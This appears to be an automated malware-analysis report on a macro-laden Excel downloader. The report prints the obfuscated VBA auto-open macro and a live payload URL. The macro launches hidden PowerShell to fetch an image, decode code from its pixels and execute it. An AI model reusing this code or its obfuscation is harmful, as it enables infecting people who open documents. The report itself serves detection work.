Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1071.001 Web Protocols
The critical OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics indicate that the Workbook_Open macro executes a Shell() command. The de-obfuscated URL 'https://images2.imgbox.com/36/b6/FP0V28Vz_o.png' is likely used to download and execute a second-stage payload. The ClamAV detection further supports the malicious nature of the file.
Heuristics: 7

- ClamAV: Xls.Downloader.Sload-6923246-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.Sload-6923246-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- URL de-obfuscated from VBA string literal (1 URL) (info, OLE_VBA_OBFUSCATED_URL): A VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime: junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: https://images2.imgbox.com/36/b6/FP0V28Vz_o.png (referenced by macro)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4885 bytes |

SHA-256: 53ddadd106819070d2d73af8d3050be9d5b27ef574367d907676a309f2cf8e42
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub kxnWvm()
Call Shell(Replace(afilate + immigration + actualprice, "?", ""), 14 - 14)
End Sub
Sub Workbook_Open()
kxnWvm
End Sub
Function afilate()
babber = "??????C?????M??????d? ????/c????? f^o?^r , ; ; ; ; ; ; /^F ; ; , ; , , , "" to?ke???ns= 1 de?l?i?ms=?af?B?pC?"" , ; ; , ; ; ; ?%?b , , , , ; ; ?^I?n ; ; ; , ; ; ; ( ; ; , , , ; ; ' , , ; ^^?F^^t?^^?Y^^P?^^E? ; , ; ^| , , ; , ^^F^^i??nD^^s?T^^R ; , , ^^c?^^m ' , ; , , , ; ) ; , , , ; ^d^O , ; ; ; ; %b /c "" e???Ch????O ?SE?t? ('JR'+'K?A') ([T?y???pe]('M???at'+'?h') ); $0Wrn?f3= [t????yP??E]('s'+'y???S'+'?t'+'eM.'+'TE??X??T.E????nco????DI??"
raro = "??N'+'g') ;^^^&('s'+'al') ('a') (""{0}{2}{1}""-f 'N','t','e???w-O?bj???ec');.('Ad?????????d'+'-Ty?????pe') -As??????se?????mb????ly?Na?????????me ""S???????y?????????s????te?m?.Dr??a??w???ing"";${G}=.('a') "
afilate = babber + raro
End Function
Function immigration()
dayoffs = "(""{5}{3}{1}{0}{2}{4}""-f'e?m.','st','Dr','y','awi?ng.Bit?m???ap','S')((.('a') (""{1}{2}{0}"" -f 'eb???Cl??????ie?nt','Net','.W')).(""{1}{0}{2}"" -f 'e','Op','nRe??????????ad').I?nv????????ok??????????????e(""??????h???t????t???p????s??:/????/?????ima???ge???s2.im??gb??ox.c??om/3?6/b?6/FP0?V28Vz_?o.pn?g???????""));${o}=^^^&('a') (""{0}{1}"" -f 'B','yte[]') 1380;(0..2)^^^|^^^&('%'){foreach(${x} in(0..459)){${p}=${G}.(""{0}{1}"" -f 'G','etPixel').Invoke(${x},${_});${O}[${_}*460+${X}]=( ( gE??T?-?Va???RIA??BLE ('JR'+'ka') ).VAl??UE::(""{0}{1}""-f 'Fl','oor').I?n??v?o?k?e?((${p}.""b""-ba?nd15)*16)-bor(${P}.""g"" -ba??nd 15))}};.('I'+'EX')( $0wRNf3::""A?SC`iI"".""Ge?TS??Tr`I`Ng""(${O}[0..1056]))|cL??iP.e??x???e&&%P??UB?LI???C:~14%m??d /?c ?po??W??er??S???h?el?L? -s?t??A -nO???nIn ? -w?i??Nd? 1 ? ?-?E?x?E?CUT??Ionp?oli???C ? ?b?Y??pA???S?S?? -N?O?P???RO??"
bermudos = "??Fi??L -N??ol??oG?????????????????O -c??????? ${6`E9}= [Sy???st???e????????????????????????????????????????m.R???efl????ec???ti????on.A??????????????????????????????ss??emb???ly]::( \""{1}{0}{3????????????????????????}{2}{4}\""-f 'W',(\""{0}{1}\""-f'Lo','ad' ),'th','i',( \""{1}{0}{3}{2}\"" -f'tialN','Par','e','am' )).\""In?V?`Oke\""(( \""{5}{1}{2}{3}{4}{0}\""-f "
immigration = dayoffs + bermudos
End Function
Function actualprice()
actualprice = "'s','ste?m.','W','in????????????d?ow?s.','F?orm','Sy' ) ) ; ( .('GV') ( \""{0}{1}{3}{2}\""-f '????????????ex?ec????????????uT','io?N','E????????????????x?t','C?ONt' ) -vA?lu?EOn?L ).\""I`N?v??ok?eC??oMm`A??Nd\"".\""I???Nv??oK`E?sc`R??IPT\""( ( [S??y?sT??em.W??IN??dO??wS?.F??oR?MS.cl??IpB?oAr??d]::( \""{1}{0}\"" -f'XT',(\""{0}{1}\""-f 'g?et','te' ) ).\""In???VO`K???E\""( )) ) ; [S??ys???te??m.Wi????ndo??w?s.?Fo??rms.C??lipb??oar??d]::( \""{1}{0}\""-f'r',( \""{0}{1}\"" -f'Cl','ea' )).\""?I?n????v`Ok???e\""( )"""
End Function
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Globa
... (truncated)
```